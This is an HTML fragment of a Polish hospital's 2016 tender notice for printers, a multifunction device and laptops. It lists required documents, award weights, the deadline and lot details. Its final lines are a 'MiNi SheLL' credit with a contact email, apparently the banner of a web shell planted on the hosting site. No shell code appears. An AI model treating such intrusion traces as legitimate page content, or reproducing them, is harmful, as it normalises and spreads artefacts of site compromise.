</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W przypadku gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, należy dołączyć oryginał lub odpis notarialny pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisany przez osoby do tego umocowane zgodnie z odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej.

2)	Formularz ofertowy (sporządzony wg wzoru Zamawiającego).

3)	Informacja dot. art. 91 ust. 3a Ustawy Pzp (sporządzona wg wzoru Zamawiającego).

4)	Cennik (sporządzony wg wzoru Zamawiającego).

5)	Dowód wniesienia wadium.

6)	Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informacja o braku przynależności do tej samej grupy kapitałowej (sporządzona wg wzoru Zamawiającego).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 5</li>
<li>3 - Skonto - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określone w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.orsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ortopedyczno - Rehabilitacyjny Szpital Kliniczny im. W. Degi UM w Poznaniu ul. 28 Czerwca 1956r nr 135/147, 61-545 Poznań - Dział Zamówień Publicznych i Sprzedaży (pok. 173 i 174).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 11:30, miejsce: Kancelaria Szpitala (pok. 35), mieszcząca się w siedzibie Zamawiającego przy ul. 28 Czerwca 1956r nr 135/147.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRUKARKI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 5</li>
<li>3. Skonto - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRUKUJĄCE   URZĄDZENIE WIELOFUNKCYJNE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 5</li>
<li>3. Skonto - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LAPTOPY ze stacja dokującą i dwoma monitorami - wersja 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.13.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 5</li>
<li>3. Skonto - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com